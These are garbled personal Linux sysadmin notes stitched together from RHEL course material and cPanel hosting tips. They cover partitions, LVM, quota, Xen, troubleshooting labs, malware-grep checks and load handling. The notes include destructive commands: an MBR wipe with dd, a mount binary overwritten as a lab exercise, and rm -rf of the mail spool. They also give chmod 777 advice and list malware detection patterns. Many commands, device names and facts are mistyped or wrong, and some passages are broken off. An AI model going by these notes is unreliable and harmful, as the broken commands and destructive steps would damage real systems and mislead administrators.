-l ost # chage -m 2 ost # chage -M 12 ost # chage -E 2007/08/11 ost # chage -E never (root) #chage -I * USER INFORMATION * Authentication :-- diff type of password GUI : system-config-authentication # Authconfig –tui NIS setting Domain : not example Server : 192.168.0.254 * how to solve a home dir error # vi /etc/fstab Ext3 ,acl -- Access control list :wq! # vi /etc/auto. master. /home/guests /etc/auto. guests --- timeout = 60 # vi /etc/auto. guests --rw, soft ,intr 192.168.0.254 /home/guests/& # mount –o remount /home # service autofs restart It is going to auto mounted features .. # useradd guest 2001 # passwd guest 2001 NIS setting # su - guest 2001 Home directory error #vi /etc/fstab LABLE-/home default , acl 1 , 2 :wq # vi /etc/auto. master /home/guess /etc/auto. master --timeout = 60 ( mount a this dir when give this command in 60 sec.) # vi /etc/auto. Guest * --rw , soft , intr 192.168.0.254 /home/guest & ---------------------------------------------- NIS Upbind & portmap 5 files effected :-- # vi /etc/sysconfig/network # vi /etc/sysconfig/Authconfig # vi /etc/pam.d /system-auth as # vi /etc/yp.conf # vi /etc/nsswitch .conf Getfacl /home/user Modifie a ACL # setfacl -M u : user1 : rwx /home/user2 # cd /home/user2 ---------------------------- # useradd user1 # passwd user1 # useradd user2 # useradd user2 # getfacl /home/user1 # setfacl -m user1:user2:rwx /home/user1 * login as user2 # cd /home/user1 . ------------------------------ * SE linux --- security enhance. * 3 modes 1) enforcing 2) disabled 3) permissive configuration file :- # vi /etc/sysconfig/selinux # ls –Z User : role : type : sensitivity : category # getenforce --> current status # vi /etc/sysconfig/selinux Selinux = enforcing # reboot 0 – permissive 1 – enforcing Cha:-- 6 filesystem management 14th sep 07 * device drivers software to drive hardware 1) static ( Vmlinuz ) CPU, RAM, HDD 2) modular (initrd.img) DEVICE NAME IN LINUX Primary master IDE HDD /dev/had Primary slave IDE HDD /dev/hdb Secondary master IDE HDD /dev/hdc Secondary slave IDE HDD /dev/hdd Primary master SCSI/SATA /dev/sda Primary slave SCSI/SATA /dev/sda secondary master SCSI/SATA /dev/sda secondary master SCSI/SATA /dev/sda modem /dev/modem com1 port /dev/tty s0 com2 port /dev/tty s1 cd rom /dev/cdrom cdwriter /dev/cdrecorder parallel port /dev/lpo ( swap is used for virtual memory # mkdir –p # mount /dev/cdrom) System directory function / main directory of linux /home home dir of non root user /boot booting related files /var variable file used by function /tmp temporary files /bin it’s binary file used by The basic commands by user /sbin system binary -- use by System administration purpose /home it’s home dir of non root user ( /etc used for configuration file /dev used by device /lib all the library file System is stored in it /opt third part s/w used when Something is download /proc current system information /media used by the removable information /user user file DIGRAM OF HDD MBR -- ( Master Boot Record ) -512 1) grub – (446 bytes ) 2) partition table 3) active partition * by default - 4 part IDE HD -- 63 part ( 3p 60p) SCSI / SATA—15 part (3p +12) * Adding up a filesystem to filesystem free: * identity device * partition device * make a filesystem * lable filesystem * add entry to fstab V . IMP * how to make a partition 1) to make partition +100M 2) define the type of filesystem ( ext3 ,ext2, swap) 3) mount the filesystem on /data(any define name) directory on -- i) temporary basic ii) parmenent basis step --> 1 # fdisk -l list of the partition # fdisk /dev/had P <-- N <-- P <-- Press enter key for default size <-- +100M <-- P <-- W <-- writing and quitting particular changes # partprobe It’s use for refreshing system without rebooting. Step --2 Ext-2 # mke2fs /dev/hda4 # mkdir --p /data # mount –t ext2 /dev/hda4 /data #mount # cd /data # ls # touch p, q, r # ls #cd # umount /data # mount * for deleting a partition #fdisk /dev/had -->P --> D --> 1-4 ….? --> P --> W--> # partprobe # mkdir –p /data # e2label /dev/hda4 /data # e2label /dev/hda4 /data # vi /etc/fstab dev/data LEBEL = /data Dump frequency fsck ---(files check) /dev/hda4 /data ext2 defaults 0 0 LABEL = /data #wq! # mount /data # mount #cd /data # touch a,b,c #cd #umount /data #mkfs. ext3 /dev/hda4 * converting to the ext2 to ext3 # mkfs. Ext3 /dev/hda4 # mkdir -p /data # mount -t ext3 /dev/hda4 /data # mount # cd /data # touch p , q ,r # cd # umount /data * permanent basis :-- * # vi /etc/fstab /dev/hda4 /data ext3 defaults 0 0 :wq! # cd /data # ls # touch c , d ,e #cd # mount #cd /data # umount /data * Converting to the ext-2 ext-3 # mkfs. Ext3 /dev/hda4 # mkdir –p /data # mount –t ext3 /dev/hda4 /data # mount # cd /data # touch p , q ,r #cd #umount /data * permanent basis # vi /etc/fstab /dev/hda4 /data /ext3 defaults 0 0 :wq! # cd /data # ls #touch c,d,e #cd #mount # cd /data # umount /data * how to install /mount an a remote nfs share :-- # mkdir -p /mnt/server1 # mount -t nfs 192.168.0.254:/var/ftp/pub/mnt/server1 #cd /mnt/server1/Redhat/RPMS #ls #cd #umount /mnt/server1 * how to auto-mounter feature of linux # vi /etc/auto.master add the 8th line /,misc /et/auto.misc –timeout = 60 :wq! # vi /etc/auto.misc Go to end of file and add Server1 -fstype=nfs 192.168.0.254:/var/ftp/pub :wq! # service autofs restart # cd /misc/server1 # mount #ls #cd Wait for 1 min # mount NETWORK CONFIGURATION 19th sep 2007 * shows active interface on u’r system # ifconfig --> shows active interface # ifconfig -a --> active & inactive interface # ip link --> to see the interface & hardware address of the interface * 3 modes of communication 1) Simplex 2) half duplex 3) full duplex 1) simplex :-- does not realy on the response of destination (e.g. radio) 2) half duplex :-- wait for acknowledgement of destination ( e.g walky talkie) Directly connection 2 sys 4) full duplex :-- ( e.g telephone) * # ethtool : this command is used to speed & duplex setting of the particular interface e.g eth 0 : eth1 100 base T -- transmits the speed 100mbps # mii -tool -V ( verbose manner) It show the capability of 2 interface # ip address :- hardware address or shows u the interfaces. * interface configuration file stored in # vi /etc/sysconfig/network-script-scripts/ifcfg-eth0 Bootprot : dhcp – converts the IP address dynamic setting for configuration file. * static setting for configuration file if having IP ADDR = NETMASK = 255.255.255.0 * DEVICE ALIASES Eth 0 Eth 0 : 1 Eth 0 : 2 * routing table :-- allows to transmit packets to remote system * how to see a current routing table on u’r system # route # netstat –r # ping –c 4 192.168.0.2 # traceroute 192.168.0.2 Hopes 30 IMP—question for exam # hostname : to see the host name * how to change a hostname to temporary bases # hostname * ho to change hostname permanent # vi /etc/sysconfig/network HOSTNAME = :wq! # service network restart Conf file :-- # vi /etc/hosts * local revolver it is used for forward & reverse lookup is given 1) forward lookup : it searches the number when name is given e.g # ssh station1 2) reverse lookup : it far name when number is given e.g. # ssh 192.168.0.1 * remote resolver : DNS # vi /etc/resolve.conf --> it’s conf file for resolver * Advanced file system management :-- 21th sep 2007 LVM : Logical Volume Manager * It helps to resize as recognize filesystem * physical device : put’s present on system : physical volumes : volume group ( club together) : logical volume * advantage :-- it’s flexibility of storage # pvcreate /dev/hda4 /dev/hda5 # vgcreate data0 /dev/hda4 /dev/hda5 # vgdisplay It’s displayed u a volume group # lvcreate -L +40mb -n data data0 (L=lenth size n= name) # lvdisplay It’s displayed u a logical volume . # mkdir –p /data # mkfs .ext3 /dev/data0/data # mount –t ext3 /dev/data0/data * steps -- # fdisk /dev/had N <-- E <-- <-- +100m <-- <-- +100 m <-- T (1 -5 number) Type – 8e <-- Num <-- Type 8e <-- p <-- W <-- # partprobe # pvcreate /dev/hda4 /dev/hda5 # vgcreate data0 /dev/hda4 /dev/hda5 # vgdisplay It’s displayed u a volume group # lvcreate -L +40mb -n data data0 (L=lenth size n= name) # lvdisplay It’s displayed u a logical volume . # mkdir –p /data # mkfs .ext3 /dev/data0/data # mount –t ext3 /dev/data0/data # mount # cd /data #ls # touch a b c # ls # cd # umount /data (fsck –l /dev/hda0/data) * how to resize LVM to save the new LV table # lvextend -l +20m -n /dev/data0 /data #resize2fs /dev/data0/data It makes the partition on the system * how to remove logical volume # umount /dev/data0/data # lvremove /dev/data0/data # lvremove data * how to remove physical volume # pvremove /dev/hda4 # pvremove /dev/hda4 # partprobe Refresh the list of partition * KIKSTART INSTALLATION --> (auto answering the system - kikstart) * do this step for server side # vi anaconda. Ks .cfg # cp anaconda .ks .cfg /var/ftp/pub/ks5.cfg # vi ks.5 cfg * client side -- insert the bootable disk in cdrom then # linux ks=nfs:192.168.0.254:/var/ftp/pub/ks5.cfg noipv6 Anaconda file Or # linux = ks noipv6 7.QUOTA SYSTEM 27th 2007 * RAID : redundant array of independent device * It’s has 3 different stages :-- RAID 0 P-1 P-II RAID -1 P-1 P-II RAID -5 P-1 P - III P-II * QUOTA SYSTEM --IMP : Needed by the administrator ( root ) so that it can prevent the non root users can’t just fill his data --> it’s used by the administrator to limit the usages of file /disk by non-root user * Two type in quota 1) inode quota --> it’s th limit the no. of file on the disk. 3) block quota --> it’s limit the no of directives on the disk. --> when you use inode quota it issues you a soft warning --> when you use block quota it issues you a hard warning IMP –Steps # vi /etc/fstab (Go to the partition & where default in written,replace it by usr quota.) /home usr,quota 1 2 :wq! # mount –o remount /home # init 1 – ( go to the single user mode) # quotacheck -cu /home # exit #quota on /home # quotaoff -->later to following step * limiting a no. of files :-- # useradd <any name> e.g test #passwd test # edquota test Block soft hard inode soft 60 100 :wq! # su –test (switch to user test ) then # for I in $(seq 1 100);do echo –n “file ${i}”; touch file ${i} 2>&1; done|less (it shows you a 1 to 100 number of sorting) # su – # edquota test Block soft hard inode soft 512 1024 :wq! # su –test # dd if=/dev/null of=bigfile bs=1k count=400 ( dd--> means convert & copy. ) ( If--> means input fif . ) ( Bs --> means block size. ) 10 . VIRTUALISTION WITH XEN * advantages of virtualization 1) security 2) management 3) effective resource usages --> In virtualization in creating a virtual system in your mainframe *hypervision :- it’s manger for xen *domain:- it’s where the virtualization system works * 2 types of virtualization available available :-- 1) para virtualization :-- here diff type of os can be created e.g. RHEL-3 , RHEL -4 , RHEL -5 etc 2) full virtualization :-- it has only 1 type of os * two package required to install the virtualization system 1) kernel-xen 2)xen # cd /etc/yum.repos.d # ls # rm server1.repo. (Remove the repository fiel) # cd #ftp server1 Name : ftp Passwd : just enter (no need for password) ftp\> cd pub change the pub directory ftp\> mget server1.repo get the sever1.repo file ftp\> quit # cp server1.repo /etc/yum.repos.d/ # yum install xen Y<-- # yum install kernel – xen Y <-- Then after that following step # vi /boot/grub/grub.conf Default : 1 replace with 0 (so it would be default 0) :wq! # reboot # uname –r Check the version # df –H ( at least 10 gb should be available for the virtualized system) # setenforce 0 # xm list # xmcreat test -c # virt-install –n test –r 300-f /tmp/test –s 6 –nographics nfs:192.168.0.254:/var/ftp/pub RHEL5 -p # xmcreat - test-c ( login for virtual system) * for existing the virtual system # poweroff # shutdown now –r # sm set-mem 1024 domain-0 * SYSTEM SERVICES *system.klogd --> (demon of log file in u’r system) - file in the system for troubleshooting # vi /var/log/mdmesg --> kernel boot message # vi /var/log/message --> system error message # vi /var/log/maillog --> error from Sendmail server # vi /var/log/secure --> security , xinetd services messages . * syslogd configuration file (stored in) # vi /etc/syslogd.conf) 1) the 1st column is indicate date & time of the message 2) the 2nd column is indicate error is been generated 3) 3rd column is indicate name of the application due from where error accureted . 4) 4th is actual message itself * X – Org --> it is the main foundation or the base of GUI X- server X-client It s/w to drive h/w any application to the display ( video card) * how to configure ur GUI # system – config –display ( /etc/x11/xorg.conf --> conf file of ur server ) ( virtual network computing ) * crontab -e -- edit a particular crontab * crontab -l -- list the particular crontab * crontab -r -- to remove a crontab # vi /etc/cron.allow --> list of user allow to use cronetab # vi /etc/cron.deny --> list of the users not permitted to use crontab (Exec metacity) * how to run an application automatically whenever GUI is started # vi /etc/X11/xinit/xinitrc.d/xterm.sh #!/bin/bash Firefox & ( command to be run at background) :wq! # chmod u+x /etc/x11/xinit/xinitrc.d/xterm.sh # start x 1st oct 2007 * how to control remote desktop Server & Client # yum install kdenetwork * Server Side Step (e.g 192.168.0.254 ) # yum install kdenetwork # startx In GUI System-->preferences--> remote desktop--> allow other to view Allow other to control Enter the password i.e Redhat -->close * client side step # yum install kdenetwork # start X Application --> internet --> krdc --> name : 192.168.0.1:0 --> allow high quality lan --> connect V-IMP ( Ts package install by RPM ) ( # rpm –ivh ftp://192.168.0.254:/pub/REdHat/RPMS /rhce -ts*.rpm ) 11. TROUBLESHOOTING LAB SEQUENCE 1) booting related problem 2) --- 3) Simple problem 1st field I) start x (start related problem) Hints :-- 1) console alive on f-7 2) check for #df –H name of the partition should be 100% filled 3) # service xfs start ( if not working) 4) # system –config-display II) networking not working 1)hostname resolution problem # hostname station1.example.com # vi /etc/resolv.conf o/p search example.com Name server 192.168.0.254 :wq! 2) cannot ping to single outside machine # ping stationX.example.com # ifconfig # service network restart ( if inet address is not available) 3) cannot ping to any machine in lab :-- # ping stationX . example.com # ifconfig # ifup eth0 (it’s start ur lan card) III) booting related problem problem might occur in following file 1) # vi /etc/inittab *hint:- i. default runlevel may be deleted. ii. check system initialization patch for correct runlevel. (Vmlinuz –it’s compress the kernel) 2) vi /boot/grub/grub.conf ( grub configuration file ) * hint :- the LABEL= / may be deleted :wq! 3) # vi /etc/rc.local * hint :- there may be halt /reboot placed in the script remove it 4) vi /etc/fstab ( mount point defined ) Hint:-- LABEL =/ may be deleted ( so add it after words ) :wq! # rpm –ivh ftp://192.168.0.254:/pub/REdHat/RPMS /rhce -ts*.rpm ( trouble shooting package installation) # tslocal 1 # tslocal 2 Login as Gertrude user with same passwd # tslocal 3 # vi /etc/fstab * check for /home partition & the userquta (usr,quta) # mount –o remount /home # touch /home/quota. User # quotacheck -cM /home— ( check that command to work) # tslocal 4 1. reboot the system & check for account it must be expire 2. reboot & go to the single user mod 3. # cahge -l root 4. # change -E never root 5. # exit * network related problem :-- # ts network # ftp mserver1.example.com # vi /etc/resolve.conf Name server 192.168.0.254 (192.168.10.254 -- mistake) :wq! # ftp server1.example.com # ping server1.cracker.org # ifup eth0 # system – config- network Change IP address 192.168.0.254 # service network restart # vi /etc/sysconfig/network-script/ifcfg-eth0 * booting related problem # tsboot 1 Here is runlevel problem So go to the # vi /etc/inittab & solve the problem :wq! # tsboot2 # vi /etc/inittab &solve the problem Change in the * how to corrupt grub boot loader & repair in rescue mode # dd if =/dev/zero of=/dev/had bs = 446 count = 1 # boot linux rescue Nfs setup - 192.168.0.254 /var/ftp/pub/RHEL5 ( it’s may be change) Continue --> # chroot /mnt/sysimage # grub-install /dev/had # exit Remove cd # exit * how to corrupt a mount command repaired at rescue mode # cp /bin/date /bin/mount # reboot # linux rescue <-- enter continue # Chroot /mnt/sysimage # rm -V util –linux ( a backup stored in it ) # exit chroot # cd mnt # cd source sysimage # cd server # ls # rpm –ivh –force - - root /mnt/sysimage util-linux* #exit #exit # mount # fdisk /dev/had ( make a logical partition) Type (t) set it to fd # partprobe # mdadm -C /dev/md0 –a yes-L 1 –n 2 /dev/had {5,6} <-- ( 4th partition is extended ) # mdadm –detail /dev/md0 # mdadm --remove /dev/md0 # cd /dev/md0 # For I in $ (seq 1 100) do echo –n “file${i}” touch file ${i} 2>&1 done | less # exit Root # edquota cat # su –cat Quota # dd if=/dev/null of=bigfile bs=1k count=400 #exit Edquota cat # su –cat 1 Linux Server Commands http://www.reallylinux.com/docs/admin.shtmlcat /etc/trueuserdomains > /usr/local/apache/htdocs/apache.txt then cd /usr/local/apache/htdocs chmod 777 apache.txt browse http://serverip/apache.txt this will show all main domains you can compare domain from whm >> list account total number of domains on the server and cd /usr/local/apache/htdocs cat apache.txt | wc -l both will show same value -------------------------------- above command will show domain names with username If want only domain names try below : cat /etc/trueuserdomains | awk '{print $1}'| cut -d: -f1 > /usr/local/apache/htdocs/apache2.txt suppose from any file you want o just print column no 3 then use awk '{print $3}' And if want to delete ":" from file from each line then : cut -d: -f1 (if colone is after 1st field) And then browse file "apache2.txt" with the server IP. When trying to access phpMyAdmin throw following error : Error #2002 - The server is not responding (or the local MySQL server's socket is not correctly configured) Solution for cPanel: chown -R cpanel:cpanel /usr/local/cpanel/base/3rdparty/phpMyAdmin ln -s /var/lib/mysql/mysql.sock /tmp/mysql.sock chown -R root:root /tmp chmod -R 1777 /tmpApache Web Server Logs: /usr/local/apache/logs/access_log /usr/local/apache/logs/error_log Exim (Email) Logs: /var/log/exim_mainlog /var/log/exim_paniclog /var/log/exim_rejectlog Ftp Logs: /var/log/messages Mysql Logs: /var/lib/mysql/server.hostname.err Cronjob Logs: /var/log/cron Server Logs: /var/log/messages SSH Logs: /var/log/secure cPanel Installation Logs: /var/log/cpanel-install-thread0.log ChkServd (cPanel Monitoring Daemon) Logs: /var/log/chkservd.log Named (Bind) Logs: /var/log/messages Last successful login attempts to the server: /var/log/wtmp (but to view the details, execute the command “last”) Last unsuccessful login attempts to the server: /var/log/utmp (To view the logs, execute “lastb” command) Domlogs of an Account: /usr/local/apache/domlogs/domainname.tld Mod Security Logs: /usr/local/apache/logs/modsec_audit.log /usr/local/apache/logs/modsec_debug_log Apache SUEXEC Logs: /usr/local/apache/logs/suexec_log cPanel Access and Error Logs: /usr/local/cpanel/logs/access_log /usr/local/cpanel/logs/error_log Stats Execution Logs: /usr/local/cpanel/logs/stats_log cPanel License Logs: /usr/local/cpanel/logs/license_log cPanel Backup Logs: /usr/local/cpanel/logs/cpbackup/*.log Tomcat Logs: /usr/local/jakarta/tomcat/logs/catalina.err /usr/local/jakarta/tomcat/logs/catalina.outLogin History : ========== (Output of command : last) root@rhodium [~]# last | more root pts/3 vpn-pool.dimenoc Fri Oct 1 08:45 still logged in root pts/3 vpn-pool.dimenoc Fri Oct 1 08:36 - 08:44 (00:07) root pts/2 dc2.ssh.dimenoc. Fri Oct 1 08:36 still logged in root pts/1 vpn-pool.dimenoc Fri Oct 1 08:36 still logged in 3gteam pts/0 115.248.197.138 Fri Oct 1 08:36 still logged in reboot system boot 2.6.18-194.11.4. Fri Oct 1 08:35 (00:10) 3gteam pts/1 115.248.197.138 Fri Oct 1 07:58 - down (00:34) 3gteam pts/0 115.248.197.138 Fri Oct 1 07:58 - down (00:35) reboot system boot 2.6.18-194.11.4. Fri Oct 1 07:43 (00:49) reboot system boot 2.6.18-194.11.4. Fri Oct 1 07:38 (00:00) reboot system boot 2.6.18-194.11.4. Fri Oct 1 07:32 (00:04) reboot system boot 2.6.18-194.8.1.e Fri Oct 1 06:59 (00:38) reboot system boot 2.6.18-53.1.21.e Fri Oct 1 06:51 (00:45) reboot system boot 2.6.18-8.el5 Fri Oct 1 06:47 (00:02) reboot system boot 2.6.18-8.el5 Fri Oct 1 05:41 (01:05) reboot system boot 2.6.18-194.8.1.e Fri Oct 1 05:36 (00:03) reboot system boot 2.6.18-8.el5 Fri Oct 1 05:24 (00:11) reboot system boot 2.6.18-194.8.1.e Fri Oct 1 05:20 (00:03) reboot system boot 2.6.18-194.8.1.e Fri Oct 1 04:58 (00:20) reboot system boot 2.6.18-53.1.21.e Fri Oct 1 04:43 (00:13) root tty1 Fri Oct 1 02:10 - 02:19 (00:09) reboot system boot 2.6.18-8.el5 Fri Oct 1 02:04 (02:52) reboot system boot 2.6.18-53.1.21.e Fri Oct 1 02:03 (00:00) reboot system boot 2.6.18-8.el5 Fri Oct 1 02:01 (00:00) reboot system boot 2.6.18-53.1.21.e Fri Oct 1 01:58 (00:01) root tty1 Fri Oct 1 01:46 - down (00:10) reboot system boot 2.6.18-194.8.1.e Fri Oct 1 01:44 (00:13) root tty1 Fri Oct 1 01:41 - down (00:00) reboot system boot 2.6.18-194.8.1.e Fri Oct 1 01:39 (00:02) reboot system boot 2.6.18-194.8.1.e Fri Oct 1 01:27 (00:09) reboot system boot 2.6.18-194.8.1.e Fri Oct 1 01:18 (00:07) reboot system boot 2.6.18-194.8.1.e Fri Oct 1 01:17 (00:00) reboot system boot 2.6.18-194.8.1.e Fri Oct 1 01:08 (00:06) reboot system boot 2.6.18-194.8.1.e Fri Oct 1 00:48 (00:26) reboot system boot 2.6.18-194.8.1.e Fri Oct 1 00:22 (00:52) reboot system boot 2.6.18-194.8.1.e Fri Oct 1 00:03 (00:16) 3gteam pts/1 115.248.197.138 Thu Sep 30 23:45 - down (00:16) 3gteam pts/0 115.248.197.138 Thu Sep 30 22:20 - down (01:42) 3gteam pts/0 115.248.197.138 Thu Sep 30 07:51 - 13:54 (06:02) 3gteam pts/0 115.248.197.138 Wed Sep 29 22:07 - 05:33 (07:26) 3gteam pts/0 115.248.197.138 Wed Sep 29 19:20 - 21:58 (02:37) 3gteam pts/0 115.248.197.138 Wed Sep 29 07:12 - 13:45 (06:32) 3gteam pts/1 115.248.197.138 Tue Sep 28 22:31 - 05:47 (07:15) 3gteam pts/2 115.248.197.138 Tue Sep 28 22:05 - 22:48 (00:43) 3gteam pts/1 115.248.197.138 Tue Sep 28 19:54 - 21:52 (01:58) 3gteam pts/0 115.248.197.138 Tue Sep 28 17:31 - 22:51 (05:20) 3gteam pts/0 115.248.197.138 Tue Sep 28 06:24 - 13:47 (07:22) 3gteam pts/0 115.248.197.138 Mon Sep 27 22:22 - 05:41 (07:18) 3gteam pts/0 115.248.197.138 Mon Sep 27 17:57 - 17:58 (00:00) 3gteam pts/0 115.248.197.138 Mon Sep 27 16:37 - 17:41 (01:04) 3gteam pts/0 115.248.197.138 Mon Sep 27 06:38 - 13:51 (07:13) 3gteam pts/2 115.248.197.138 Mon Sep 27 01:25 - 02:10 (00:44) 3gteam pts/1 115.248.197.138 Mon Sep 27 00:48 - 01:26 (00:38) 3gteam pts/0 115.248.197.138 Sun Sep 26 23:14 - 05:48 (06:34) 3gteam pts/1 115.248.197.138 Sat Sep 25 23:02 - 05:50 (06:47) 3gteam pts/0 115.248.197.138 Sat Sep 25 22:18 - 23:09 (00:50) /scripts/makecpphpChecking Malware contents for any account : Steps : 1. login to shell 2. fire one command given below : grep -ilr "kusik-tusik-trf.com" /home/*/public_html/index.* grep -ilr "iframe" * grep -ilr "eval(base64_decode" * most probably search : grep -ilr "eval(unescape" * 3. You will get file name. Open the file and search for the malware using particular word and then remove that line. for example, If you have used this command grep -ilr "kusik-tusik-trf.com" /home/*/public_html/index.* then search the file for word kusikModules : Memcache : What is Memcached? Free & open source, high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load. Istallation of memcache module from the server : Memcached is an in-memory key-value store for small chunks of arbitrary data (strings, objects) from results of database calls, API calls, or page rendering. Please use following commands for installtion; [root@ip-192-168-2-125 wordpressapi]# wget http://download.fedora.redhat.com/pub/epel/5/i386/epel-release-5-2.noarch.rpm [root@ip-192-168-2-125 wordpressapi]# yum remove php-common [root@ip-192-168-2-125 wordpressapi]# yum install php-pdo php-mcrypt squirrelmail php-pecl-apc php-xml php-gd php-devel php php-imap php-pgsql php-pear php-soap php-mbstring php-ldap php-mysql php-cli php-pecl-memcache [root@ip-192-168-2-125 wordpressapi]# /etc/init.d/memcached restart Shutting down Distributed memory caching (memcached): [ OK ] Starting Distributed memory caching (memcached): [ OK ] [root@ip-192-168-2-125 wordpressapi]# /etc/init.d/httpd restart Stopping httpd: [ OK ] Starting httpd: [ OK ] [root@ip-192-168-2-125 wordpressapi]# vim /etc/php.ini In php.ini file Please find the “extension=modulename.extension” words Under that sentance please paste following line: extension=memcache.so Note: dont comments that line. [root@ip-192-168-2-125 wordpressapi]# /etc/init.d/httpd restart Stopping httpd: [ OK ] Starting httpd: [ OK ] [root@ip-192-168-2-125 wordpressapi]##ps -auxf #killwhom exim #killwhom imap #killwhom nobody #killall -9 httpd #mysqladmin pr #ps -C exim -fH eww | grep home #top -c Attack #netstat -plan |grep :80|awk '{print $5}' |cut -d: -f1 |sort |uniq -c |sort -n #netstat -an | grep SYN|sort|uniq|awk '{print $5}'|sed 's/\:/ /g'|awk '{print "csf -d "$1}' important file :- vi /etc/my.cnf netstat -lnp | grep '0.0.0.0:80' exim -bp | awk '$6~"frozen" { print $3 }' | xargs exim -Mrm ps -eo pcpu,pid,user,args | sort -k 1 -r | head -10 cd /tmp rm -rf sess_* pidof httpd http://centralops.net/co/ find */public_html/* -name .pure* Cron log file :- tail -f /var/log/cron path of cron :- vi /var/spool/cron/username How to check logs :- tail -f /var/log/messages tail -f /var/log/lfd.log Go to /var/spool/exim/input and then fire below command egrep "X-PHP-Script" * -R Errorr : JFTP::mkdir: Bad response # JFTP::chmod: Bad response # JF while install or uninstall joomla extensions http://docs.joomla.org/How_to_solve_Installation_errors_Extension_Manager\ So you designed a perfect site locally. Then uploaded it and decided it needed some plugins. You enabled FTP in configuration.php and tried to Install your plugin, template or language but you get: I got the following error: * JFolder::create: Infinite loop detected * JFTP::store: Bad response * Warning! - Failed to move file This means that there are some server settings which are wrong. You have to go to your global configuration and click on server. The first field is Path to Temp-folder and that's most likely the local path of you local install. You have to give in your live server path. There are multiple ways to find that path. The easy one is to create a path.php file that has the following code in it: <?php echo getcwd(); ?> Go to example.com/path.php Example : http://sizzlingtimes.com/path.php and path will be as : /home/sizzling/public_html/tmp and this will give you the right directory. Put /tmp behind it, place it in Path to Temp-folder and your done. When you do not use FTP your directory and file permissions need to be set. The problem is that there are a lot of directories and their default setting is 755 which is safe and makes it impossible for users of the same server to place files in you directory. 755 does not make it possible to install or uninstall languages, templates or extensions. If you change it to 777, you will be able to install and uninstall all your stuff, but… its not that safe. To make it easy you can make a php file which sets all the directory settings right to 777 when you want to install stuff, and sets it back to 755 when you are done. The following files need to be set tot 777 to make installation possible: ************************************************************************ http://forum.joomla.org/viewtopic.php?f=431&t=314112&start=0&st=0&sk=t&sd=a # JFTP::mkdir: Bad response # JFTP::chmod: Bad response # JFTP::store: Bad response # Warning! Failed to move file Do you have the Joomla FTP Layer enabled? (Global Configuration > Server > FTP Settings)? Could you try to set the permission for the "modules" directory to 777, so that it is accessible by the web-server. You might need to set some other directories as well. ****************************************************** Can you try the following: Login to the admin interface Click on Help Click on System Info Click on Directory Permissions You will see a list of Directories which are writable/unwritable Can you check each one which is unwritable and set it's permission to 777 Or you can follow the steps here: http://docs.joomla.org/How_to_solve_Installation_errors_Extension_Manager /usr/local/apache/conf/modsec2.user.conf saint.nseasy #SecRule HTTP_Content-Type "!(^application/x-www-form-urlencoded|^multipart/form-data;|^text/xml).*$" after commenting root@saint [/home/nzflyfis/public_html]# /etc/init.d/httpd restart Syntax error on line 20 of /usr/local/apache/conf/modsec2.user.conf: ModSecurity: Disruptive actions can only be specified by chain starter rules. issue http://www.surmunity.com/showthread.php?29104-Wordpress-spellcheck-problem reply to client : it is not possible to change the default configuration of shared server. <IfModule mod_env.c> SetEnv MODSEC_ENABLE Off PassEnv MODSEC_ENABLE </IfModule> Enable mod_rewrite on Apache Introduction to mod_rewrite and Apache Mod_rewrite allows you to rewrite a webpage's url on the fly, and you can rewrite the url to almost anything. It has a lot of uses everything from redirecting multiple WebPages to a new domain without actually changing the title, to making dynamic pages appear static. Check to see if mod_rewrite is enabled There are several ways to check if its working, I will try to show you the simplest method, Create a .htaccess file (a text file named .htaccess) with the following code in it Options +FollowSymLinks RewriteEngine On Save the file to a subdirectory of your main site something like this /rewrite-testfolder/.htaccess Now attempt to browse to the subdirectory (http://localhost/rewrite-testfolder/). One of two things could happen - No errors Congrats mod_rewrite engine is now enabled. - 500, Internal Server Error If you get this message then mod_rewrite was not installed/enabled on your computer. ******************************************************************************** OF THIS DOES NOT WORK The Magic of mod_rewrite Here's a simple example for you: create three text files named test.html, test.php, and .htaccess. In the test.html file, enter the following: <h1>This is the HTML file.</h1> In the test.php file, add this: <h1>This is the PHP file.</h1> Create the third file, .htaccess, with the following: RewriteEngine on RewriteRule ^/?test\.html$ test.php [L] http://www.example.com/path/to/test.html ************************************************************************************ http://www.apacheref.com/ref/mod_rewrite.html mod_rewrite - Advanced URL Translation And Redirection Since Apache 1.2, src/modules/standard/mod_rewrite.c Ralf S. Engelschall (1996) mod_rewrite is the Swiss Army Knife of URL manipulations. It provides virtually all of the functions one would ever need to manipulate URLs, and its functionality is highly generalized. Consequently, mod_rewrite can be used to solve all sorts of URL-based problems. The drawback is the high learning curve, because this module is based on a complex rule-based matching engine, which uses regular expressions for its patterns. Although the flexibility of mod_rewrite makes it a very complex tool, once you understand the basic idea you will master all existing and forthcoming URL-based problems in your webmaster's life. Directives: RewriteEngine RewriteOptions RewriteLog RewriteLogLevel RewriteLock RewriteMap RewriteBase RewriteCond RewriteRule Common steps to check loaded server : ========================== (Note : take permissions of the supervisor before using kill command.) (Note : Before any rm -rf command, always execute "pwd" command strictly.) 1. w If load is more than 60 then ask supervisor and kill httpd and exim killall -9 httpd killall -9 exim 2. top Figure out processes creating load (http/mysql/exim), If http load then http check for common site name, If more than 7-8 entries found and requests are from same IP, block the IP. csf -d IP If more than 15 entires found for same site, suspend site user /scripts/whoowns site-name /scripts/suspendacct username If mysql load then watch mysqladmin pr If time is more than 200 and "Command" status is Query then suspend database cd /var/lib/mysql chmod 000 database-name If exim load then exim -bp check processes with 0 minute wait time take process ID of mails for common sender. exim -Mvh process-ID You will see all the details like path of mailing scripts. Disable the problematic script file. chmod 000 script-path OR exim -bpc If output is more than 1200 then empty mailque or remove frozen mails. cd /var/spool/exim pwd rm -rf input Steps for Server Configuration ========================================================== I >First login to poweradmin One and two (Add Supermaster zone) IP---new server IP Host name -- ns1.site.com or 1.nseasy.com Account : server name II >After that Search Zone and Records ---site.com After that Edit and Add A record(Ip of the new server) III > After that open another shell(another server) and type vi /etc/named.conf Copy the line also-notify with IP address and semi colon and New server : vi /etc/named.conf Paste the also notify lines and save (:wq!) IV > On the shell of the new server, type useradd 3gteam passwd 3gteam Enter the password for 3gteam. Restart sshd V > Then vi /etc/group wheel:x:10:root,3gteam VI >Then vi /etc/ssh/sshd_config Remove # and enter port number 1097 Remove # and PermitRootlogin Yes Change to PermitRootlogin No In WHM, In ConfigServer Security & Firewall, Firewall Configuration and add the IP 1097 in TCP_IN and TCP_Out VII >Go to WHM >> ConfigServer Security & Firewall >> Check Server Security >> Check /tmp permissions , Check /var/tmp permissions, Check /usr/tmp permissions Change all permissions as given in WHM on the shell VIII >Check the php.ini file of the another server and compare it with the new server(Disable functions >> Just remove exec from the shell 